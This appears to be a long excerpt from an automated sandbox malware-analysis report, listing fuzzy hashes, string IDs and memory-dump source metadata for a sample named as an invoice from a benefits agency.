                                                                                  • Opcode Fuzzy Hash: 5317b31f848b710a6dc26a21adf53b5bf58adf5d4041d946408c57a2599cd90d
                                                                                  • Instruction Fuzzy Hash: 91818D75B002059FCB14DF68C984A6EBBF6FF88310F1581A9E505EB3A5DB34AD05CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q
                                                                                  • API String ID: 0-2033115326
                                                                                  • Opcode ID: cfa937a231c7c74d479505a19081ce799bf779c021f5e059de0b443746481bcd
                                                                                  • Instruction ID: ed946304f95e076598cfc03800e72ee23708e5ab249ba3c1e10e924d4a727c3b
                                                                                  • Opcode Fuzzy Hash: cfa937a231c7c74d479505a19081ce799bf779c021f5e059de0b443746481bcd
                                                                                  • Instruction Fuzzy Hash: 3071B471B006059FCB18DF79D8809AEBBF2FF88210B558569E509EB3A5EF34AD05CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq
                                                                                  • API String ID: 0-301743287
                                                                                  • Opcode ID: a816b5b9c618afbb375c56f6a7aaf101fa2edfab501af96c46900d0a2684798a
                                                                                  • Instruction ID: 90a69ac85e7616cfe7a2750e667cee3f1da5c07c9fb18fcc6338ce6c1e646cae
                                                                                  • Opcode Fuzzy Hash: a816b5b9c618afbb375c56f6a7aaf101fa2edfab501af96c46900d0a2684798a
                                                                                  • Instruction Fuzzy Hash: AC611678B106059FCB14DF68D8849AEBBB6FF8D315B1481A9E9069B325DB30EC01CF80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: bb89969b81e82b269721d9c585dd68f252d62dbae4dde636790fd5b586b5bd6a
                                                                                  • Instruction ID: a187437754a55fa9dc63f53b4bb5a1af4c5c7762a6fe1498b971f8a28b66ebd0
                                                                                  • Opcode Fuzzy Hash: bb89969b81e82b269721d9c585dd68f252d62dbae4dde636790fd5b586b5bd6a
                                                                                  • Instruction Fuzzy Hash: D9510130B002119FDB289F25D898B6EBBE3FF88714F108969E5969B394EF319C45C791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q
                                                                                  • API String ID: 0-2033115326
                                                                                  • Opcode ID: 69a068b3c6ecb055bd8fadd35108efc13af6bd0aaaf420b5628f53ef6aa53ad0
                                                                                  • Instruction ID: dd1c195cc91768b2dcdad1a9c56f0489e1d851f8fbf96e31a7475221d492c1ed
                                                                                  • Opcode Fuzzy Hash: 69a068b3c6ecb055bd8fadd35108efc13af6bd0aaaf420b5628f53ef6aa53ad0
                                                                                  • Instruction Fuzzy Hash: 48415E74B001058FCB58EF68C494AAEBBF2EF88720F5445A9D506EB7A4DB35AD05CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: s+
                                                                                  • API String ID: 0-1285507049
                                                                                  • Opcode ID: c6b34a6567eb79a36490a72ee553190d694b9b5f0e83579ac80740edd62cbf0b
                                                                                  • Instruction ID: dacf658f039e80cdd2e7af39faa055559d0db9a178c6de760b6eb3adf9fe393c
                                                                                  • Opcode Fuzzy Hash: c6b34a6567eb79a36490a72ee553190d694b9b5f0e83579ac80740edd62cbf0b
                                                                                  • Instruction Fuzzy Hash: 0441E671A002199FCF04DFA4D89469EBBF6EF85310F44816AE909AB255EF74AD06CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: 8cd9f3dd64599a72f4a0322d42e1b7487cff81bdae06ae6f4cfb29093b46e843
                                                                                  • Instruction ID: db678a7c3d7b08dba2cfb06aafdc515b2c69642ed64bfe7a26733e911333397c
                                                                                  • Opcode Fuzzy Hash: 8cd9f3dd64599a72f4a0322d42e1b7487cff81bdae06ae6f4cfb29093b46e843
                                                                                  • Instruction Fuzzy Hash: 76418B71B102068FCB04DF78D985A6EBBF6FF89314B508669E409DB364DB30EC068B90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hcq
                                                                                  • API String ID: 0-419967981
                                                                                  • Opcode ID: ea037d25a87cc1a335befc116ba602690c6562773bb60cbd820b2bd8210182a7
                                                                                  • Instruction ID: a230d2d423ecc6888a2039984c2f71b2f6a4b5d77e8890790c43a1d8ac02076a
                                                                                  • Opcode Fuzzy Hash: ea037d25a87cc1a335befc116ba602690c6562773bb60cbd820b2bd8210182a7
                                                                                  • Instruction Fuzzy Hash: 61319232A103099FCB01EFB8C8459EEBFB5FF86210B01866AE545EB250EF30D559CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: dcd6c757eb4854530afea5bc86aa95f05a6821994bffb1413bd18441e1bc613b
                                                                                  • Instruction ID: d2477189abcb91cae0c402a787009e6399de11d43b2b4fa075153e3184290981
                                                                                  • Opcode Fuzzy Hash: dcd6c757eb4854530afea5bc86aa95f05a6821994bffb1413bd18441e1bc613b
                                                                                  • Instruction Fuzzy Hash: B5317E74610B418FC774DF79D984A5ABBF1FF88320B144B2DE0A68B7A4D730A909CB95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: 6be1917d2bd658f1abe3cb0b916e40afa6bdb00d6aac8cd5286875983165e57f
                                                                                  • Instruction ID: e0f2e0ecaf61ae01d756a8cdfd0f6bf3b1a989ced2e1db90de7b6fa240da8331
                                                                                  • Opcode Fuzzy Hash: 6be1917d2bd658f1abe3cb0b916e40afa6bdb00d6aac8cd5286875983165e57f
                                                                                  • Instruction Fuzzy Hash: 6131E434B10205AFDB18DF61DC99BAEBBB6FF88710F448159F242AB290DF719841DB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q
                                                                                  • API String ID: 0-2033115326
                                                                                  • Opcode ID: 899ab91d1ab5b42eec21a37da096eba8ad23ba258ad565c9b99e7d21d8025be1
                                                                                  • Instruction ID: 94d0552eb41e0a1347ca927a1a761a699087c56a6d5c4f394c19fbe63b02d8c8
                                                                                  • Opcode Fuzzy Hash: 899ab91d1ab5b42eec21a37da096eba8ad23ba258ad565c9b99e7d21d8025be1
                                                                                  • Instruction Fuzzy Hash: 962101712007064FC729DB38D95476E7BE2FF84320B444A6DD086C76A9EF74B9088B84
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q
                                                                                  • API String ID: 0-2033115326
                                                                                  • Opcode ID: 63c186af62d16fe85c1a88d0270342e8317f0d37ce5efac664fb5e3495df1748
                                                                                  • Instruction ID: 7445cd4ba12dfab1ee0b68af1e78f474f428b1ccd84682b434ee8b591553d5fc
                                                                                  • Opcode Fuzzy Hash: 63c186af62d16fe85c1a88d0270342e8317f0d37ce5efac664fb5e3495df1748
                                                                                  • Instruction Fuzzy Hash: C321C1713007064FC728EF29D95475EBBE6FF88320B444A6CD046CB6A9EF75B9098B94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K]
                                                                                  • API String ID: 0-3798347547
                                                                                  • Opcode ID: cf9f7035de8c674f314fb7c2407e73aae637583e1b8d130af176a8fd49d24761
                                                                                  • Instruction ID: 2aabcba5372c68a6990b8c0b16d62876235e57fba936c4ad323d8110c3d035e9
                                                                                  • Opcode Fuzzy Hash: cf9f7035de8c674f314fb7c2407e73aae637583e1b8d130af176a8fd49d24761
                                                                                  • Instruction Fuzzy Hash: 1F111A78B102018BCB54DE69D88459EBBE5FF89261744C56AE85ACF319EB30ED058BA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq
                                                                                  • API String ID: 0-301743287
                                                                                  • Opcode ID: 4451890df52599f1a944e304755240b855d2da1f91c1a7e8db8f8eee4f591446
                                                                                  • Instruction ID: 484e0450270214317c5a6487fee907ba2630723239115acb4007671bf1ea536c
                                                                                  • Opcode Fuzzy Hash: 4451890df52599f1a944e304755240b855d2da1f91c1a7e8db8f8eee4f591446
                                                                                  • Instruction Fuzzy Hash: 0E11D6793042458FCB15DB2CC480A2A7BE6FFDD26075984AEE499CB754DF31EC028B50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq
                                                                                  • API String ID: 0-301743287
                                                                                  • Opcode ID: 6c6414fc0814c3cc1ad9755e93f7c65873ae2f8ffe1134ddd100c0bf480edd87
                                                                                  • Instruction ID: 89a257e1a81d513fb84a1d389d7c0e3e7c7f0d963fab5282bb31a94c30ef46ec
                                                                                  • Opcode Fuzzy Hash: 6c6414fc0814c3cc1ad9755e93f7c65873ae2f8ffe1134ddd100c0bf480edd87
                                                                                  • Instruction Fuzzy Hash: 430144723042189FC7186B2C9840A2FBBEAFFC8620724466EE509C33C0DF28AD0183A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K]
                                                                                  • API String ID: 0-3798347547
                                                                                  • Opcode ID: bb796d0f5935d6dd60966c2b817787e525e4046e1aa2483d410dd9d0b3bd981d
                                                                                  • Instruction ID: 56a3c03fc51bbc36bce75f7e5410329017d7aa834d01895ea0976d8a13c59917
                                                                                  • Opcode Fuzzy Hash: bb796d0f5935d6dd60966c2b817787e525e4046e1aa2483d410dd9d0b3bd981d
                                                                                  • Instruction Fuzzy Hash: 7E113D787002018BCF54DF69D88499EBBE5FF89260744C47AE849CF319EB30ED058BA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K]
                                                                                  • API String ID: 0-3798347547
                                                                                  • Opcode ID: a0467450bca2a2e26737fce074e843e73fb446dc0c75225878fafdb6aa038a41
                                                                                  • Instruction ID: 490613d6e95e77370658b7b6d116ec7449d3f9f45482ed41e663fa69beef309a
                                                                                  • Opcode Fuzzy Hash: a0467450bca2a2e26737fce074e843e73fb446dc0c75225878fafdb6aa038a41
                                                                                  • Instruction Fuzzy Hash: 5B113D747002018BCF54DF69D48459EBBE5EF88260344C57AE849DF319EB30ED058B60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq
                                                                                  • API String ID: 0-301743287
                                                                                  • Opcode ID: f999c2f0be313ba454b782ed2c749e426760ee46f90b2d9ee2940a8daf4637cb
                                                                                  • Instruction ID: 867ef4c69b692b5d99dab86da51bbb635c8b5c3da120164eee3a3c7f2b9c2caa
                                                                                  • Opcode Fuzzy Hash: f999c2f0be313ba454b782ed2c749e426760ee46f90b2d9ee2940a8daf4637cb
                                                                                  • Instruction Fuzzy Hash: 2D116D793002419FCB54DB6DD484A2ABBE7EBCD26076885AEE44A8B344DE31EC028B50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: bc7a635c6c50e2737011834f64b8eba1766b65f095b920a9ec5c30f2243cde60
                                                                                  • Instruction ID: 013b2a5e6a26cf54c753bd6d8404a4712fc1409dc9052026d50b6492ebcf122e
                                                                                  • Opcode Fuzzy Hash: bc7a635c6c50e2737011834f64b8eba1766b65f095b920a9ec5c30f2243cde60
                                                                                  • Instruction Fuzzy Hash: 82115A75B50214CFCB18EF68C41869D7BF2BF88200F550469E806EB7A1CF799C01CB94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: 3b18e51e52e5b428a3b92083ede800d479d6e889db7291665c86124dedff28f3
                                                                                  • Instruction ID: bb9771c484cedeb443d3d357cac5237116e9fcf2e92389b21c3c055b67e90054
                                                                                  • Opcode Fuzzy Hash: 3b18e51e52e5b428a3b92083ede800d479d6e889db7291665c86124dedff28f3
                                                                                  • Instruction Fuzzy Hash: ED112770A00218CFCB18EB68C418A9DBBF6FF88700F1104A9E806EB3A0CF759C01CB94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: e67905db72c62cb35e2bd8aa787b98fd90e633194cb05ec96f5fb41641e987e5
                                                                                  • Instruction ID: b89ae95c47c8a19195ba57bcd4a8b4531d3751135a4b8abce7194e9c617f497b
                                                                                  • Opcode Fuzzy Hash: e67905db72c62cb35e2bd8aa787b98fd90e633194cb05ec96f5fb41641e987e5
                                                                                  • Instruction Fuzzy Hash: 07F046767002005FC315CB6DD990A6EBB9AEFCD220714846BE808CB355CA368C0A83A0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: 865b8568f18784379b20e81f0d54711238b580113137a1cfc386f7e2484b1818
                                                                                  • Instruction ID: f38eaefbc0f55bea59114e39b6f6f914fa826ab987e6618df881318ee0714871
                                                                                  • Opcode Fuzzy Hash: 865b8568f18784379b20e81f0d54711238b580113137a1cfc386f7e2484b1818
                                                                                  • Instruction Fuzzy Hash: 4EF0A7363100105FC7489B1EE858E4EB7DAEFCDA24B144065F109CB3A1CE60DC018794
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: d7313fd5c1f42bb7ff8ec6bcb60ce9b09f8ae7b8382ba745015da10c57a73487
                                                                                  • Instruction ID: 2e0b25af52601159e40954c51921775adf978860c5e5554ff26760fa62fe1413
                                                                                  • Opcode Fuzzy Hash: d7313fd5c1f42bb7ff8ec6bcb60ce9b09f8ae7b8382ba745015da10c57a73487
                                                                                  • Instruction Fuzzy Hash: B9F0E5313141545F8709AB6E989C85ABBEAFFCA62535540ADF109D73A2CE119C0187A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: 8ead5a4faaa5dfb952a93c23379619abaef7d4ead02ca105648d433215979c49
                                                                                  • Instruction ID: 75fbee102270924b2fce0962cd6f8fc7173045ddfa954b38306892171e0dc4e1
                                                                                  • Opcode Fuzzy Hash: 8ead5a4faaa5dfb952a93c23379619abaef7d4ead02ca105648d433215979c49
                                                                                  • Instruction Fuzzy Hash: 5FE065353104105FC7589B6EE85CE5EBBDAEFCDB20B214069F509CB3A1CE61DC018795
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q
                                                                                  • API String ID: 0-238743419
                                                                                  • Opcode ID: a17b5d01cd5ef1d4ec7d0172422dd274ee1f23ae08696db2d5c73fb0cf1c8347
                                                                                  • Instruction ID: a15529480863082d90d612b711578de55c273fd8b5a67bdb8b5c0cf976e0e7fc
                                                                                  • Opcode Fuzzy Hash: a17b5d01cd5ef1d4ec7d0172422dd274ee1f23ae08696db2d5c73fb0cf1c8347
                                                                                  • Instruction Fuzzy Hash: D9F06D31E04508DFDF11CF65DA84BEC7BB2FB48315F14D025E945AA210DB319944CF64
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 44441132365464761b73273f5c421ccbe8e797cf5dd6b525ba11ec77d7f3e309
                                                                                  • Instruction ID: 8f4c66b06cb00835d57969f89328e564554682792abf6bad7c5f0320e82a625b
                                                                                  • Opcode Fuzzy Hash: 44441132365464761b73273f5c421ccbe8e797cf5dd6b525ba11ec77d7f3e309
                                                                                  • Instruction Fuzzy Hash: E1E18D78A00215CFCB05CF68C984AAAB7F2FF88310B55C559E849AB365EB34ED45CF94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14a89bcd167baca79dbfeb23d9e0480ee5698cb597548a11c2294a0ccb4df879
                                                                                  • Instruction ID: 2b20b1c1bc1d262550468f2743cf41f68a65f304019466bef3d44e48d66f330e
                                                                                  • Opcode Fuzzy Hash: 14a89bcd167baca79dbfeb23d9e0480ee5698cb597548a11c2294a0ccb4df879
                                                                                  • Instruction Fuzzy Hash: AFC1F939E1054ADFCF00CF99C9808AEBBB6FF49314B24846AE955AB310D731ED16CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3a23139057509011d653ec6b43e0cfd91aceb06bb1c6c2613c504086d2e6702
                                                                                  • Instruction ID: 33c3f180dea9c1fa572d31e02357965073a6b47dcb617d04f801d5dba24aba16
                                                                                  • Opcode Fuzzy Hash: e3a23139057509011d653ec6b43e0cfd91aceb06bb1c6c2613c504086d2e6702
                                                                                  • Instruction Fuzzy Hash: 55B15075B002148FCB18EB69D4986AEB7F3EFC8310B548469D516AB398DF38AD41CF94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f42172de2490fc3ffcdeb16e816262ba80cb1347e26890e7bed54266aed7ed23
                                                                                  • Instruction ID: 59f3458083a7e621340593da7a66eb8f56143b3e70d3b61f1a85f30cb6eca52c
                                                                                  • Opcode Fuzzy Hash: f42172de2490fc3ffcdeb16e816262ba80cb1347e26890e7bed54266aed7ed23
                                                                                  • Instruction Fuzzy Hash: 1EC1E378B006059FD714DF68C884EAAB7F2FF88314F558099E965AB3A5DB34EC41CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 234cf3132bf2f4ffc1ba07f2ccaafc1e01666af5f490f0d5566f5b28fccd6d84
                                                                                  • Instruction ID: c658ed5fee69a4200eaa74d8bd65d48074990d4c27c5c2f508ee1d158eb2876a
                                                                                  • Opcode Fuzzy Hash: 234cf3132bf2f4ffc1ba07f2ccaafc1e01666af5f490f0d5566f5b28fccd6d84
                                                                                  • Instruction Fuzzy Hash: B1A1AE75B002159FCB14EB68C490A6EBBA7FF88304F548569D54ADB384EF38EC42CB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e0f5fdf51d6e8a5d9244c985168407b820845da6be5d48421888f0b474c8a36b
                                                                                  • Instruction ID: f453a1f71ed5a392de511d1dca46100c691063bb513a46af76fcc316247813ca
                                                                                  • Opcode Fuzzy Hash: e0f5fdf51d6e8a5d9244c985168407b820845da6be5d48421888f0b474c8a36b
                                                                                  • Instruction Fuzzy Hash: EEB1AC756006059FD724CF68C880A6AFBF2FF88314B588969E599DB751DB31FC41CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a4d22fdf2827ccda7723fe8c7106c99cb4eab32f892a6216aeb5cb7d072ef76e
                                                                                  • Instruction ID: 56abb2eca257e2e2e19a657598beac0193e27287b265302eed9225f3751d5d1b
                                                                                  • Opcode Fuzzy Hash: a4d22fdf2827ccda7723fe8c7106c99cb4eab32f892a6216aeb5cb7d072ef76e
                                                                                  • Instruction Fuzzy Hash: 36A10874B00609CFDB18DBA8C594AADBBF2FF88310B5445A9E546EB365DB31AD01CF90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5d28139432349dc4a5b7d1f1994ab875bf837612ec3258700124ec523f707123
